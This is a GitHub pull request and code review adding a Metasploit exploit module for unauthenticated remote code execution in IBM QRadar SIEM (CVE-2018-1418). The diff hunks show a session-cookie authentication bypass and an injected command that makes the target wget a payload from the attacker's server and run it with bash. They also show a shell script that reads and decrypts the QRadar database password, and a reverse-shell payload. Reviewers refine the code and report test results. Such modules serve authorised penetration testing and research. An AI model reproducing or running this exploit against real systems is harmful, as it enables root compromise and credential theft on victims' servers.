### PR TITLE
Add exploit for QRadar, CVE-2018-1418

### PR DESCRIPTION
**Pull request by pedrib**
IBM QRadar SIEM has three vulnerabilities in the Forensics web application
        that when chained together allow an attacker to achieve unauthenticated remote code execution.

        The first stage bypasses authentication by fixating session cookies.
        The second stage uses those authenticated sessions cookies to write a file to disk and execute
        that file as the "nobody" user.
        The third and final stage occurs when the file executed as "nobody" writes an entry into the
        database that causes QRadar to execute a shell script controlled by the attacker as root within
        the next minute.
        Details about these vulnerabilities can be found in the advisories listed in References.

        The Forensics web application is disabled in QRadar Community Edition, but the code still works,
        so these vulnerabilities can be exploited in all flavours of QRadar.
        This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. Most likely all versions released since
        mid 2014 are vulnerable, as that was when the Forensics application was introduced.

        Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload.

### CODE REVIEW

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 1]
```diff
@@ -0,0 +1,221 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: `https`

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 2]
```diff
@@ -0,0 +1,221 @@
...
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+         ['CVE', '2018-1418'],
+         ['URL', 'https://blogs.securiteam.com/index.php/archives/3689'],
+         ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'],
+         ['URL', 'FULLDISC_URL']
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: http://seclists.org/fulldisclosure/2018/May/54
http://www-01.ibm.com/support/docview.wss?uid=swg22015797

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 3]
```diff
@@ -0,0 +1,221 @@
...
+      'cookie'    => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
+      'vars_get'  =>
+      {
+        'action'  => 'setSecurityTokens',
+        'forensicsManagedHostIps' => "#{rand(256)}.#{rand(256)}.#{rand(256)}.#{rand(256)}"
+      },
+      'data'      => post_data
+    })
+
+    if res.code != 200
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: This probably needs a check for `res.nil?`, or rescue-from-method and `fail_with(Failure::Unreachable, 'Connection failed')`

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 4]
```diff
@@ -0,0 +1,221 @@
...
+
+    res = send_request_cgi({
+        'uri'       => uri_step2 + '&' + payload_step2,
+        'method'    => 'GET',
+        'cookie'    => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
+      })
+
+  # now we just sit back and wait for step 2 payload to be downloaded and executed
+  # ... and then step 3 to complete. Let's give it a little more than a minute.
+  sleep 80
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: I'm not sure if it makes a difference, but `Rex.sleep` is a thing

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 5]
```diff
@@ -0,0 +1,221 @@
...
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('SRVHOST', [true, 'HTTP server address', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'HTTP server port', '4448']),
+      ])
+  end
+
+  def check
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: Golfing your code; and adding a polite `Connection failed` verbose print.

```ruby
  def check
    res = send_request_cgi({
      'uri'    => '/ForensicsAnalysisServlet/',
      'method' => 'GET'
    })

    if res.nil?
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 403
      return CheckCode::Detected
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error 'Connection failed'
    return CheckCode::Unknown
  end
```

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 6]
```diff
@@ -0,0 +1,221 @@
...
+    send_response(cli, @payload)
+  end
+
+
+  # step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet
+  def set_cookies
+    @sec_cookie = SecureRandom.uuid
+    @csrf_cookie = SecureRandom.uuid
+
+    post_data = "#{rand_text_alpha(rand(12)+5)},#{rand_text_alpha(rand(12)+5)}," +
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: A change was made to the `rand_text_*` methods not long ago. Now you can do this:

```ruby
rand_text_alpha(5..17)
```

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 7]
```diff
@@ -0,0 +1,221 @@
...
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit #{target.name}")
+
+    # run step 1
+    set_cookies
+
+    # let's prepare step 2 (payload) and 3 (payload exec as root)
+    @payload_name = rand_text_alpha_lower(3+rand(5))
+    root_payload = rand_text_alpha_lower(3+rand(5))
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: A change was made to the `rand_text_*` methods not long ago. Now you can do this:

```ruby
rand_text_alpha(5..8)
```

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 8]
```diff
@@ -0,0 +1,221 @@
...
+
+    # let's do step 2 then, ask QRadar to download and execute our payload
+    print_status("#{peer} - Asking QRadar to download and execute #{service_uri}")
+
+    exec_cmd = "$(mkdir -p /store/configservices/staging/updates && wget --no-check-certificate -O " +
+      "/store/configservices/staging/updates/#{@payload_name} #{service_uri} && " +
+      "/bin/bash /store/configservices/staging/updates/#{@payload_name})"
+
+    payload_step2 = "pcap[0][pcap]" +
+      "=/#{rand_text_alpha_lower(rand(6) + 2) + '/' + rand_text_alpha_lower(rand(6) + 2)}" +
```
Comment (bcoles) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: A change was made to the `rand_text_*` methods not long ago. Now you can do this:

```ruby
rand_text_alpha(2..8)
```

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 9]
```diff
@@ -0,0 +1,221 @@
...
+
+### below is adapted from /opt/qradar/support/changePasswd.sh
+[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf"
+NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2`
+FRAMEWORKS_PROPERTIES_FILE="frameworks.properties"
+FORENSICS_USER_FILE="config_user.xml"
+FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE"
+
+# get the encrypted db password from the config
+PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=]*)(?=<)'`
```
[the remark this answers is not in the document]
Comment (pedrib) [reply modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: @gianninou thanks for the tip! I'm testing it now on my VM and seeing if your change works here.

[the remark this answers is not in the document]
Comment (pedrib) [reply modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: @gianninou Can you try the exploit as it is now? I've changed grep to:
grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'

With this changes it works well on my end. Hopefully it also works on yours. I think they were missing some b64 characters in the regex.

Should work on yours. This code was taken from an IBM script by the way. So we're fixing their bugs...

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 10]
```diff
@@ -0,0 +1,226 @@
...
+PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'`
+
+QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}')
+
+AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm
+P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-)
+P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-)
+
+#if 7.2.8 or greater, use new method for hashing and salting passwords
+if [ $QVERSION -gt 727 ]
```
Comment (itmaciek) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: Another "if" should be added here. I'm on 7.3 and I don't have "aes.key=" on frameworks file. If that's empty, decrypting option for "727" should be used.

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 11]
```diff
@@ -0,0 +1,226 @@
...
+then
+    PASSWORD=$(perl <(echo ${P_DEC} | base64 -d) <(echo ${PASSWORDENCRYPTED}))
+      [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
+else
+    AESKEY=`grep 'aes.key=' $NVACONF/$FRAMEWORKS_PROPERTIES_FILE | cut -c9-`
```
Comment (itmaciek) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: Another "if" should be added here. I'm on 7.3 and I don't have "aes.key=" on frameworks file. If that's empty, decrypting option for "727" should be used.

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb [hunk 12]
```diff
@@ -0,0 +1,226 @@
...
+        [
+         ['CVE', '2018-1418'],
+         ['URL', 'https://blogs.securiteam.com/index.php/archives/3689'],
+         ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'],
+         ['URL', 'http://seclists.org/fulldisclosure/2018/May/54'],
+         ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg22015797']
+        ],
+      'Targets'        =>
+        [
+          [ 'IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 27', {} ],
```
Comment (itmaciek) [inline modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: 7.2.8 Patch 11, not 27

File: modules/exploits/linux/http/ibm_qradar_unauth_rce.rb (hunk 11 above)
Comment (pedrib) [reply modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: The exploit doesn't work as is on yours?

Comment (itmaciek) [reply modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: Nope, doesn't decrypt password using runjava.sh. I'm on 7.3, but I have to use 727 method, that way exploit works. I do not have "aes.key=" line on my frameworks file.

Comment (itmaciek) [reply modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: All good now.

Comment (pedrib) [reply modules/exploits/linux/http/ibm_qradar_unauth_rce.rb]: great, thanks!

**Comment by wvu-r7** [comment]
Nice submission, @pedrib! I enjoyed the writeup. :)

**Comment by pedrib** [comment]
@wvu-r7 thanks, this was a fun one to find!

**Comment by busterb** [comment]
Found some target systems to try. Giving this a go.

**Comment by pedrib** [comment]
@busterb yeah I only tested 7.3.0 and 7.3.1 CE myself. 
So are you saying the exploit doesn't work at all? Or only the check method fails?

**Comment by nt-redsec** [comment]
Hi,

We tried given codes on QRadar 7.2.8 Patch 6 and couldnt make it work. So we decided not to check for token verification(cause it responds with 200 everytime) and changed the payload to a simple python one liner so we manage to have a shell with nobody user. We will let you know if we can solve PE on QRadar 7.2.8. Patch 6.

Bests,

**Comment by pedrib** [comment]
@nt-redsec thanks for trying it out but I didn't understand what you meant. What changes did you make to the exploit to work? Are you saying the shell part works but the privilege escalation does not?

**Comment by busterb** [comment]
Hi @pedrib, I tried 7.2.6, 7.2.7, and 7.2.8 with the latest commits here. Both the exploit fails and the check method returns not vulnerable.

**Comment by pedrib** [comment]
@busterb that's a shame, seems like 7.2.9 to 7.3.1 are working. If you can get me access to those instances I can try to make the exploit work on them... according to IBM's advisory, 7.2.8 should also be vulnerable. The others might be vulnerable too and they didn't bother to issue a patch.

**Comment by busterb** [comment]
Do you think that the possible difference isn't the version, but that I have a fully-licensed version? It's not the community edition. So, the app in question may actually be enabled, causing it to go down a different path?

**Comment by pedrib** [comment]
@busterb Doubt it, the bootstrap code should be the same. Most likely there are nuances in the code paths that we need to take into account.

@nt-redsec @gianninou did you guys try the exploit on a licensed version?

**Comment by gianninou** [comment]
@pedrib sorry for my late answer.
Yes I think it was a licensed version and I can't retest the exploit on it, the server was restaged :(

**Comment by busterb** [comment]
I don't think I can get my server routed outbound for testing. Will look at landing this as-is so if someone is in the field later we can update it for production then.

**Comment by pedrib** [comment]
Ok cool. It is pretty much ready to go. IBM finally gave us 2 other CVE, one for each the exploited vulns, and I've added them to the references section.

**Comment by pedrib** [comment]
ok?

**Comment by busterb** [comment]
Added 625050767e

**Comment by busterb** [comment]
## Release Notes

This adds an exploit module for the IBM QRadar SIEM, exploiting three vulnerabilities in the Forensics web application that when chained together allow an attacker to achieve unauthenticated remote code execution.

**Comment by busterb** [comment]
Thanks @pedrib

**Pull request merged**